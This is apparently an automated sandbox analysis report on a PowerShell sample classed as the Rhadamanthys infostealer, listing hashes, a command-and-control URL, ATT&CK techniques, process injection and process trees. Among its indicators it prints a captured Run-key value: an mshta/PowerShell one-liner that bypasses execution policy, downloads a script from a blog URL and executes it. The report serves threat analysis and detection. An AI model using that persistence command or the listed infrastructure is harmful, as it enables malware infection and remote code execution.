rhadamanthys | b2082d4666cd9eb57896b04058438fad6a268e504d877b908ae276b3c68799fe

Resubmissions

07/03/2025, 19:55

250307-ynad7swms2 10

07/03/2025, 17:58

250307-wj7g2atzet 10

Analysis

max time kernel
92s
max time network
95s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
07/03/2025, 19:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ddd.ps1
Size

2.4MB
MD5

5b322ca0eb9655beaf39e4453d141cd2
SHA1

b556cbaf50c2b77fd73d4386f068f0bbffe7504d
SHA256

b2082d4666cd9eb57896b04058438fad6a268e504d877b908ae276b3c68799fe
SHA512

0648609146167599498b41bdb97c02eb0947ba03e44ee63c3448bd6b2508b4bd7054a63671c12120b01240bba810489da68e3f79dc2a7674447ad760127dcc1b
SSDEEP

1536:P26vgn00oR/S7rdvtk76qu6p5LSTFPNWdD7uHzgjw8b560jSKkjptOVNjC5GGQli:bYf

Score

10^/10

rhadamanthys discovery execution persistence stealer

Malware Config

Extracted

Family

rhadamanthys

https://94.156.71.221:1485/ba9365b02ebb09b86/kscmx9w7.etux2

Signatures

Detects Rhadamanthys payload 1 IoCs

resource	yara_rule
behavioral2/memory/1612-33-0x0000000001100000-0x00000000011B2000-memory.dmp	Rhadamanthys_v8

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Rhadamanthys family
rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 1612 created 2928	1612	RegSvcs.exe	49
PID 4944 created 2928	4944	RegSvcs.exe	49

Deletes itself 1 IoCs

pid	Process
2568	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\Desdwnessr2 = "mshta \"javascript:tt=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm hotelmainrat2024.blogspot.com/hegegehe \| iex);Start-Sleep -Seconds 5;','run']; da=[tt[3],tt[0],tt[1],tt[2]]; new ActiveXObject(da[2])[da[0]](da[3], 0, true);close();new ActiveXObject(da[1]).DeleteFile(WScript.ScriptFullName);\"\r\n"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defswadswner1 = "schtasks /run /tn Defswadswner1"	powershell.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2568 set thread context of 4944	2568	powershell.exe	83
PID 2568 set thread context of 1612	2568	powershell.exe	84
PID 2568 set thread context of 3752	2568	powershell.exe	85
PID 2568 set thread context of 5028	2568	powershell.exe	86
PID 2568 set thread context of 2480	2568	powershell.exe	87
PID 2568 set thread context of 4000	2568	powershell.exe	88

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	dw20.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2568	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Msbuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dw20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dw20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dw20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dw20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Msbuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe

Checks processor information in registry 2 TTPs 28 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe

Suspicious behavior: EnumeratesProcesses 33 IoCs

pid	Process
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
1612	RegSvcs.exe
1612	RegSvcs.exe
4944	RegSvcs.exe
4944	RegSvcs.exe
1596	openwith.exe
1596	openwith.exe
1596	openwith.exe
1596	openwith.exe
992	msedge.exe
992	msedge.exe
1952	msedge.exe
1952	msedge.exe
3064	msedge.exe
3064	msedge.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeIncreaseQuotaPrivilege	2568	powershell.exe
Token: SeSecurityPrivilege	2568	powershell.exe
Token: SeTakeOwnershipPrivilege	2568	powershell.exe
Token: SeLoadDriverPrivilege	2568	powershell.exe
Token: SeSystemProfilePrivilege	2568	powershell.exe
Token: SeSystemtimePrivilege	2568	powershell.exe
Token: SeProfSingleProcessPrivilege	2568	powershell.exe
Token: SeIncBasePriorityPrivilege	2568	powershell.exe
Token: SeCreatePagefilePrivilege	2568	powershell.exe
Token: SeBackupPrivilege	2568	powershell.exe
Token: SeRestorePrivilege	2568	powershell.exe
Token: SeShutdownPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeSystemEnvironmentPrivilege	2568	powershell.exe
Token: SeRemoteShutdownPrivilege	2568	powershell.exe
Token: SeUndockPrivilege	2568	powershell.exe
Token: SeManageVolumePrivilege	2568	powershell.exe
Token: 33	2568	powershell.exe
Token: 34	2568	powershell.exe
Token: 35	2568	powershell.exe
Token: 36	2568	powershell.exe
Token: SeRestorePrivilege	1608	dw20.exe
Token: SeBackupPrivilege	1608	dw20.exe
Token: SeBackupPrivilege	1608	dw20.exe
Token: SeBackupPrivilege	1608	dw20.exe
Token: SeBackupPrivilege	1608	dw20.exe
Token: SeBackupPrivilege	2760	dw20.exe
Token: SeBackupPrivilege	2760	dw20.exe
Token: SeBackupPrivilege	2476	dw20.exe
Token: SeBackupPrivilege	2476	dw20.exe
Token: SeBackupPrivilege	3200	dw20.exe
Token: SeBackupPrivilege	3200	dw20.exe
Token: SeIncreaseQuotaPrivilege	2568	powershell.exe
Token: SeSecurityPrivilege	2568	powershell.exe
Token: SeTakeOwnershipPrivilege	2568	powershell.exe
Token: SeLoadDriverPrivilege	2568	powershell.exe
Token: SeSystemProfilePrivilege	2568	powershell.exe
Token: SeSystemtimePrivilege	2568	powershell.exe
Token: SeProfSingleProcessPrivilege	2568	powershell.exe
Token: SeIncBasePriorityPrivilege	2568	powershell.exe
Token: SeCreatePagefilePrivilege	2568	powershell.exe
Token: SeBackupPrivilege	2568	powershell.exe
Token: SeRestorePrivilege	2568	powershell.exe
Token: SeShutdownPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeSystemEnvironmentPrivilege	2568	powershell.exe
Token: SeRemoteShutdownPrivilege	2568	powershell.exe
Token: SeUndockPrivilege	2568	powershell.exe
Token: SeManageVolumePrivilege	2568	powershell.exe
Token: 33	2568	powershell.exe
Token: 34	2568	powershell.exe
Token: 35	2568	powershell.exe
Token: 36	2568	powershell.exe
Token: SeIncreaseQuotaPrivilege	2568	powershell.exe
Token: SeSecurityPrivilege	2568	powershell.exe
Token: SeTakeOwnershipPrivilege	2568	powershell.exe
Token: SeLoadDriverPrivilege	2568	powershell.exe
Token: SeSystemProfilePrivilege	2568	powershell.exe
Token: SeSystemtimePrivilege	2568	powershell.exe
Token: SeProfSingleProcessPrivilege	2568	powershell.exe
Token: SeIncBasePriorityPrivilege	2568	powershell.exe
Token: SeCreatePagefilePrivilege	2568	powershell.exe
Token: SeBackupPrivilege	2568	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe
1952	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2568 wrote to memory of 4944	2568	powershell.exe	83
PID 2568 wrote to memory of 4944	2568	powershell.exe	83
PID 2568 wrote to memory of 4944	2568	powershell.exe	83
PID 2568 wrote to memory of 4944	2568	powershell.exe	83
PID 2568 wrote to memory of 4944	2568	powershell.exe	83
PID 2568 wrote to memory of 4944	2568	powershell.exe	83
PID 2568 wrote to memory of 4944	2568	powershell.exe	83
PID 2568 wrote to memory of 4944	2568	powershell.exe	83
PID 2568 wrote to memory of 1612	2568	powershell.exe	84
PID 2568 wrote to memory of 1612	2568	powershell.exe	84
PID 2568 wrote to memory of 1612	2568	powershell.exe	84
PID 2568 wrote to memory of 1612	2568	powershell.exe	84
PID 2568 wrote to memory of 1612	2568	powershell.exe	84
PID 2568 wrote to memory of 1612	2568	powershell.exe	84
PID 2568 wrote to memory of 1612	2568	powershell.exe	84
PID 2568 wrote to memory of 1612	2568	powershell.exe	84
PID 2568 wrote to memory of 3752	2568	powershell.exe	85
PID 2568 wrote to memory of 3752	2568	powershell.exe	85
PID 2568 wrote to memory of 3752	2568	powershell.exe	85
PID 2568 wrote to memory of 3752	2568	powershell.exe	85
PID 2568 wrote to memory of 3752	2568	powershell.exe	85
PID 2568 wrote to memory of 3752	2568	powershell.exe	85
PID 2568 wrote to memory of 3752	2568	powershell.exe	85
PID 2568 wrote to memory of 3752	2568	powershell.exe	85
PID 2568 wrote to memory of 5028	2568	powershell.exe	86
PID 2568 wrote to memory of 5028	2568	powershell.exe	86
PID 2568 wrote to memory of 5028	2568	powershell.exe	86
PID 2568 wrote to memory of 5028	2568	powershell.exe	86
PID 2568 wrote to memory of 5028	2568	powershell.exe	86
PID 2568 wrote to memory of 5028	2568	powershell.exe	86
PID 2568 wrote to memory of 5028	2568	powershell.exe	86
PID 2568 wrote to memory of 5028	2568	powershell.exe	86
PID 2568 wrote to memory of 2480	2568	powershell.exe	87
PID 2568 wrote to memory of 2480	2568	powershell.exe	87
PID 2568 wrote to memory of 2480	2568	powershell.exe	87
PID 2568 wrote to memory of 2480	2568	powershell.exe	87
PID 2568 wrote to memory of 2480	2568	powershell.exe	87
PID 2568 wrote to memory of 2480	2568	powershell.exe	87
PID 2568 wrote to memory of 2480	2568	powershell.exe	87
PID 2568 wrote to memory of 2480	2568	powershell.exe	87
PID 2568 wrote to memory of 4000	2568	powershell.exe	88
PID 2568 wrote to memory of 4000	2568	powershell.exe	88
PID 2568 wrote to memory of 4000	2568	powershell.exe	88
PID 2568 wrote to memory of 4000	2568	powershell.exe	88
PID 2568 wrote to memory of 4000	2568	powershell.exe	88
PID 2568 wrote to memory of 4000	2568	powershell.exe	88
PID 2568 wrote to memory of 4000	2568	powershell.exe	88
PID 2568 wrote to memory of 4000	2568	powershell.exe	88
PID 5028 wrote to memory of 3200	5028	RegSvcs.exe	89
PID 5028 wrote to memory of 3200	5028	RegSvcs.exe	89
PID 5028 wrote to memory of 3200	5028	RegSvcs.exe	89
PID 4000 wrote to memory of 2476	4000	Msbuild.exe	90
PID 4000 wrote to memory of 2476	4000	Msbuild.exe	90
PID 4000 wrote to memory of 2476	4000	Msbuild.exe	90
PID 3752 wrote to memory of 1608	3752	RegSvcs.exe	91
PID 3752 wrote to memory of 1608	3752	RegSvcs.exe	91
PID 3752 wrote to memory of 1608	3752	RegSvcs.exe	91
PID 2480 wrote to memory of 2760	2480	Msbuild.exe	92
PID 2480 wrote to memory of 2760	2480	Msbuild.exe	92
PID 2480 wrote to memory of 2760	2480	Msbuild.exe	92
PID 1612 wrote to memory of 1596	1612	RegSvcs.exe	93
PID 1612 wrote to memory of 1596	1612	RegSvcs.exe	93
PID 1612 wrote to memory of 1596	1612	RegSvcs.exe	93
PID 1612 wrote to memory of 1596	1612	RegSvcs.exe	93

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2928
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1596
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ddd.ps1
1⤵
- Deletes itself
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4944
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1612
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3752
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
    dw20.exe -x -s 800
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious use of AdjustPrivilegeToken
    PID:1608
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
    dw20.exe -x -s 816
    3⤵
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious use of AdjustPrivilegeToken
    PID:3200
- C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
  "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
    dw20.exe -x -s 800
    3⤵
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious use of AdjustPrivilegeToken
    PID:2760
- C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
  "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4000
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
    dw20.exe -x -s 816
    3⤵
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious use of AdjustPrivilegeToken
    PID:2476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://appdata/
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9ca053cb8,0x7ff9ca053cc8,0x7ff9ca053cd8
  2⤵
  PID:2732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,17763303918286165250,17418944369616257082,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:2380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,17763303918286165250,17418944369616257082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,17763303918286165250,17418944369616257082,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
  2⤵
  PID:4420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,17763303918286165250,17418944369616257082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
  2⤵
  PID:4476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,17763303918286165250,17418944369616257082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:2736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,17763303918286165250,17418944369616257082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
  2⤵
  PID:1164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,17763303918286165250,17418944369616257082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
  2⤵
  PID:3532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,17763303918286165250,17418944369616257082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3492 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,17763303918286165250,17418944369616257082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:2900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,17763303918286165250,17418944369616257082,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:2864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,17763303918286165250,17418944369616257082,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
  2⤵
  PID:424

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3612

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2640

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:336

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Filesize
315B

MD5
99e92a3edcac9c781669a965aeafa3cd

SHA1
